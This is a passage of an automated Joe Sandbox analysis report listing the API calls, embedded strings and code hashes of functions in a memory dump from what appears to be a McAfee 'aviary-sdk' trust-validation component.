                                • VariantCopy.OLEAUT32(?,?), ref: 003F39D8
                                • VariantInit.OLEAUT32(?), ref: 003F39EE
                                • VariantCopy.OLEAUT32(?,?), ref: 003F39F8
                                • VariantClear.OLEAUT32(?), ref: 003F3A66
                                • VariantClear.OLEAUT32(?), ref: 003F3A6C
                                • VariantClear.OLEAUT32(?), ref: 003F3A72
                                  • Part of subcall function 003EEF50: VariantInit.OLEAUT32(?), ref: 003EEF8A
                                  • Part of subcall function 003EEF50: VariantChangeType.OLEAUT32(00000000,?,00000000,00000016), ref: 003EEFB2
                                  • Part of subcall function 003EEF50: VariantClear.OLEAUT32(00000000), ref: 003EEFC3
                                  • Part of subcall function 003EEF50: _com_issue_error.COMSUPP ref: 003EEFE6
                                  • Part of subcall function 003EEF50: VariantClear.OLEAUT32 ref: 003EEFF1
                                • _com_issue_error.COMSUPP ref: 003F3A94
                                • _com_issue_error.COMSUPP ref: 003F3A9A
                                • VariantInit.OLEAUT32(A05DD77D), ref: 003F3AD4
                                • VariantClear.OLEAUT32(?), ref: 003F3B20
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$Clear$Init$_com_issue_error$Copy$ChangeType
                                • String ID:
                                • API String ID: 3696672285-0
                                • Opcode ID: 7f0117877a2eba61b92153fd04024803f8c1be6e9c17f7b4ba624fd7270eb593
                                • Instruction ID: 3f2395a5bea0854c095103d0c6f26716947303cbfba0d8e7043578a81aa486f9
                                • Opcode Fuzzy Hash: 7f0117877a2eba61b92153fd04024803f8c1be6e9c17f7b4ba624fd7270eb593
                                • Instruction Fuzzy Hash: 4F512375D0025DDBCF01DFA9CC45AEEBBB8FF48314F10462AE915A7250EB34AA44CBA4
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 0040D81C
                                • SysFreeString.OLEAUT32(?), ref: 0040DB76
                                  • Part of subcall function 003F52D0: GetCurrentThreadId.KERNEL32 ref: 003F52D9
                                  • Part of subcall function 0040DF40: QueryUnbiasedInterruptTime.KERNEL32(?,A05DD77D,?,00000000,?,0043D290,000000FF,?,0040DE6F,?), ref: 0040DEBC
                                  • Part of subcall function 0040DF40: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040DEEF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentThread$FreeInterruptQueryStringTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp$failed to create controller -- not caching$failed to initialize COM$failed to update cache$trust$trust$update_cache
                                • API String ID: 212005684-576793877
                                • Opcode ID: 1977caced016c458e616f920845b8f074c622666fe99bd0510ebcb027483110d
                                • Instruction ID: 932357c31a8e493a80b1515e12d2968dd997392e1035726489a7cc0806910d8c
                                • Opcode Fuzzy Hash: 1977caced016c458e616f920845b8f074c622666fe99bd0510ebcb027483110d
                                • Instruction Fuzzy Hash: B0128B71D002689BDB21DFA0CC41BDEBBB4AF18304F1081EAE509B7291EB755E88CF95
                                APIs
                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00428011
                                • type_info::operator==.LIBVCRUNTIME ref: 00428033
                                • ___TypeMatch.LIBVCRUNTIME ref: 00428142
                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00428214
                                • _UnwindNestedFrames.LIBCMT ref: 00428298
                                • CallUnexpected.LIBVCRUNTIME ref: 004282B3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                • String ID: csm$csm$csm
                                • API String ID: 2123188842-393685449
                                • Opcode ID: bd6475a33020a316d1291ff0f27e035cc560cc4a3d3e0c93f283397e8e65fb70
                                • Instruction ID: d91aa22feb6c4486480b327d62d5d6c7c84aaf1269a519b4b20dca609bfd11cd
                                • Opcode Fuzzy Hash: bd6475a33020a316d1291ff0f27e035cc560cc4a3d3e0c93f283397e8e65fb70
                                • Instruction Fuzzy Hash: 2CB1CF31A01229DFCF18DF95E8419AEB7B5BF04314B90459FE8146B302CB38E911CFA9
                                APIs
                                • FreeLibrary.KERNEL32(00000000), ref: 00411DFC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: '%ls' is not signed by McAfee$C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp$PZ$P|$failed to validate '%ls'$mfe_trust_init$mfe_trust_uninit$mfe_trust_validate
                                • API String ID: 3664257935-127399813
                                • Opcode ID: dbbba347882e2a8c21f54a34b5855e59f3378280f5af5a2f61d784ac17191d03
                                • Instruction ID: d9baddef8be8f5602a01b870d466b4370c737f09aa8ec8f34d2152f4650fc673
                                • Opcode Fuzzy Hash: dbbba347882e2a8c21f54a34b5855e59f3378280f5af5a2f61d784ac17191d03
                                • Instruction Fuzzy Hash: FDA10570D043589FEF20CFA4C944BDEBBB4BF05304F10859AD549AB291DBB89A89CF65
                                APIs
                                • GetModuleHandleW.KERNEL32(Advapi32.dll,A05DD77D), ref: 003F1BBF
                                • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 003F1BD7
                                • RegCloseKey.ADVAPI32(00000000), ref: 003F1C4F
                                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?,A05DD77D), ref: 003F1CEE
                                • RegCloseKey.ADVAPI32(00000000), ref: 003F1F80
                                • PostMessageW.USER32(00000002,00000000,00000000), ref: 003F20DC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Close$AddressHandleMessageModulePostProcQueryValue
                                • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                • API String ID: 1163662419-2994018265
                                • Opcode ID: e97c5846123a4760c03188e0c9c8632c1a57d19a9c1747ca4672755a38abfd25
                                • Instruction ID: 078f49b441624e59c151059fe790a14b61e0b3350b0dd0285e669e305ce216ae
                                • Opcode Fuzzy Hash: e97c5846123a4760c03188e0c9c8632c1a57d19a9c1747ca4672755a38abfd25
                                • Instruction Fuzzy Hash: 8C02E131A0025CEBEF25CF14EC89BEE77B5AF45304F154298FA09A7290E775AE84CB54
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000040,00000000,00000000,?), ref: 003E574C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003E574F
                                • GetProcessHeap.KERNEL32(00000000), ref: 003E5762
                                • CreateSemaphoreExW.KERNEL32(00000000,00000000,00000001,?,00000000,001F0003,?,?), ref: 003E57EF
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E58A0
                                • HeapFree.KERNEL32(00000000), ref: 003E58A3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Heap$Process$AllocateCreateFreeSemaphore
                                • String ID: _p0$T>
                                • API String ID: 3337013264-3997765521
                                • Opcode ID: aa1f5d1f17e7a3a51af377dcdc10baa1f0db2c64c958b6006fe2e5d6e1fdfafe
                                • Instruction ID: d233642662786645f02d24c6c4480f3a55ee832508c9423b2a87a481a0f5c72e
                                • Opcode Fuzzy Hash: aa1f5d1f17e7a3a51af377dcdc10baa1f0db2c64c958b6006fe2e5d6e1fdfafe
                                • Instruction Fuzzy Hash: DD410271B143549BD311EF66EC46B6BB7E8EF88314F00462DF9499B281EB74DD008BA5
                                APIs
                                • RtlDecodePointer.NTDLL(?), ref: 0043873C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DecodePointer
                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                • API String ID: 3527080286-3064271455
                                • Opcode ID: e127dad162e440336174c2904c9739a27f0a25033546d5e0c81014532d5fb527
                                • Instruction ID: fec9153be3740befc1dd75bbf20633465f003f993028f4ae9ade26e023d2a9be
                                • Opcode Fuzzy Hash: e127dad162e440336174c2904c9739a27f0a25033546d5e0c81014532d5fb527
                                • Instruction Fuzzy Hash: D75149B490070ACBDB189F69E84C1AEFBB0FB49304F95505AE491A6254CF7C8A25CB5A
                                APIs
                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,000000C8,?,?,00425059,00000000,00425185,A05DD77D,000000C8,00000001,0043A630,000000FF,?,00412CB8,?), ref: 004250F7
                                • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 0042510A
                                • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 00425119
                                • GetProcAddress.KERNEL32(00000000,WakeByAddressAll), ref: 00425127
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: WaitOnAddress$WakeByAddressAll$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0.dll
                                • API String ID: 667068680-629889153
                                • Opcode ID: 35454c0dacae52c60a850e10c65aa535fb51b1746814ceb13229ce6e85380443
                                • Instruction ID: d6c6c84c495fb09be6cfee5ecb8580d481b65bce1579375ebe9509c77065e182
                                • Opcode Fuzzy Hash: 35454c0dacae52c60a850e10c65aa535fb51b1746814ceb13229ce6e85380443
                                • Instruction Fuzzy Hash: 8B01FE75B003105BDB105F99BC497AB7B68E796751B60043FFE09D3350E6B8C890875D
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                • String ID:
                                • API String ID: 3943753294-0
                                • Opcode ID: f50776d54b4b3742d0a569b54f6b494039a5aa8c810f08855b0e67d785c9735c
                                • Instruction ID: 57c5d41376eec16a69344c2fec78ff523a3041f8942246899d7687efcab88eb5
                                • Opcode Fuzzy Hash: f50776d54b4b3742d0a569b54f6b494039a5aa8c810f08855b0e67d785c9735c
                                • Instruction Fuzzy Hash: 9B519D35B00225DFCF10DF64E58096ABBF5EF89310BA4406AD9069B245DB78ED81CF69
                                APIs
                                • SysStringLen.OLEAUT32(?), ref: 003E9809
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E9B79
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: StringUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\aviary-sdk\include\aviary\internal\framework_external_client_impl.h$framework$framework$invoke_rpc$invoke_rpc failed for: '%.*ls'
                                • API String ID: 38351148-1254097396
                                • Opcode ID: dfe8afb389d9b73229d317ff74f9058249540e9d5e7fd6181fdff9331bac7e70
                                • Instruction ID: 9bcce2387dfd04d141f652fd41635ca7512f98e6c4df8c5f2145e8a599c0d1d4
                                • Opcode Fuzzy Hash: dfe8afb389d9b73229d317ff74f9058249540e9d5e7fd6181fdff9331bac7e70
                                • Instruction Fuzzy Hash: 65D1E670D002A8DFDF11DFA5C845BDEBBB5BF05304F1082AEE449A7282E774AA84CB55
                                APIs
                                • SysAllocStringLen.OLEAUT32(00000000,00000004), ref: 003EB6C2
                                • GetCurrentThreadId.KERNEL32 ref: 003EB789
                                • SysFreeString.OLEAUT32(?), ref: 003EB801
                                • SysFreeString.OLEAUT32(?), ref: 003EB80E
                                • SysFreeString.OLEAUT32(?), ref: 003EB81B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$AllocCurrentThread
                                • String ID: dummy$listen_event
                                • API String ID: 3091281111-1468111930
                                • Opcode ID: cd30be2c16aa0b545a7a43d8a79e7bc54f0b653a46e12f1a9a2912f96e2d0383
                                • Instruction ID: 4112e6e94c10918b91a7a121639fc44f5309eb251d32ba0825dafd57d3a010d9
                                • Opcode Fuzzy Hash: cd30be2c16aa0b545a7a43d8a79e7bc54f0b653a46e12f1a9a2912f96e2d0383
                                • Instruction Fuzzy Hash: A8A1D874D002699FDB15CFA9C984B9DFBF5BF48300F1481AAE919AB381DB749A44CF50
                                APIs
                                • SysAllocStringLen.OLEAUT32(00000000,00000004), ref: 003EAEC2
                                • GetCurrentThreadId.KERNEL32 ref: 003EAF89
                                • SysFreeString.OLEAUT32(?), ref: 003EB001
                                • SysFreeString.OLEAUT32(?), ref: 003EB00E
                                • SysFreeString.OLEAUT32(?), ref: 003EB01B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$AllocCurrentThread
                                • String ID: dummy$subscribe
                                • API String ID: 3091281111-3273043397
                                • Opcode ID: a8630a3b933b0e99c445b5add7f3c1bcf45975c4d6a4ae6c669de89dcee953d3
                                • Instruction ID: 39ac3796e02c755dc924901611888b273382dd45579033370262bcc66404acbf
                                • Opcode Fuzzy Hash: a8630a3b933b0e99c445b5add7f3c1bcf45975c4d6a4ae6c669de89dcee953d3
                                • Instruction Fuzzy Hash: B8A1FA74D002688FDB15CFA9C984B9DBBF5BF48310F1481AAD819AB381E774AE44CF51
                                APIs
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                • SysAllocStringLen.OLEAUT32(00000000,00000002), ref: 003EA410
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 003E7C00: SysAllocStringLen.OLEAUT32(00000000,00000014), ref: 003E7C16
                                • GetCurrentThreadId.KERNEL32 ref: 003EA4BA
                                • SysFreeString.OLEAUT32(?), ref: 003EA4FF
                                • SysFreeString.OLEAUT32(?), ref: 003EA50C
                                • SysFreeString.OLEAUT32(?), ref: 003EA519
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$Alloc$CurrentInterruptMtx_init_in_situPreciseQueryThreadTimeUnbiased
                                • String ID: dummy$get setting
                                • API String ID: 1410445602-3615255267
                                • Opcode ID: 7e260e6928a2dad9a2f7f2ae77a3d2cc683dd3bb0bb10f12a48a50984f506886
                                • Instruction ID: ee2d99d76c4956de020820181bbf945182a430636d6b7cdaa15dbf3d79c737dd
                                • Opcode Fuzzy Hash: 7e260e6928a2dad9a2f7f2ae77a3d2cc683dd3bb0bb10f12a48a50984f506886
                                • Instruction Fuzzy Hash: 31917371E006689FDB11DFA9C945BAEBBB4FF09300F154269E405AB2D1DB34AE44CB52
                                APIs
                                • SysAllocStringLen.OLEAUT32(00000000,00000001), ref: 003EC63E
                                • GetCurrentThreadId.KERNEL32 ref: 003EC6F9
                                • SysFreeString.OLEAUT32(?), ref: 003EC76D
                                • SysFreeString.OLEAUT32(?), ref: 003EC77A
                                • SysFreeString.OLEAUT32(?), ref: 003EC787
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$AllocCurrentThread
                                • String ID: dummy$unsubscribe
                                • API String ID: 3091281111-26685671
                                • Opcode ID: 6437ef3e3948af155e47ca7fe32d0b49271c646c6bf827f13c442fe7ebd0473c
                                • Instruction ID: 5d2d2e8278ce84a96d26fe004bbc88c344e665ec99d67e55e77f0e06f98b7014
                                • Opcode Fuzzy Hash: 6437ef3e3948af155e47ca7fe32d0b49271c646c6bf827f13c442fe7ebd0473c
                                • Instruction Fuzzy Hash: EF917171D10268DFDF11CFA9C944B9EBBB5BB05300F14829AE409AB2C1DB749E85CF55
                                APIs
                                  • Part of subcall function 00424CBF: RtlAcquireSRWLockExclusive.NTDLL(?), ref: 00424CC5
                                  • Part of subcall function 00424CDB: RtlReleaseSRWLockExclusive.NTDLL(00000000), ref: 00424CE1
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                • SysAllocStringLen.OLEAUT32(00000000,00000001), ref: 003EC190
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 003E7C00: SysAllocStringLen.OLEAUT32(00000000,00000014), ref: 003E7C16
                                  • Part of subcall function 003E7AA0: SysAllocStringLen.OLEAUT32(00000000,?), ref: 003E7AE9
                                • GetCurrentThreadId.KERNEL32 ref: 003EC227
                                • SysFreeString.OLEAUT32(?), ref: 003EC265
                                • SysFreeString.OLEAUT32(?), ref: 003EC272
                                • SysFreeString.OLEAUT32(?), ref: 003EC27F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$AllocFree$ExclusiveLock$AcquireCurrentInterruptMtx_init_in_situPreciseQueryReleaseThreadTimeUnbiased
                                • String ID: dummy$register_for_system_events
                                • API String ID: 2292269400-4124618671
                                • Opcode ID: bb14ab59d989622441ad99d6a401b98fcc74a1e9bb167a369adf7ce91b01f895
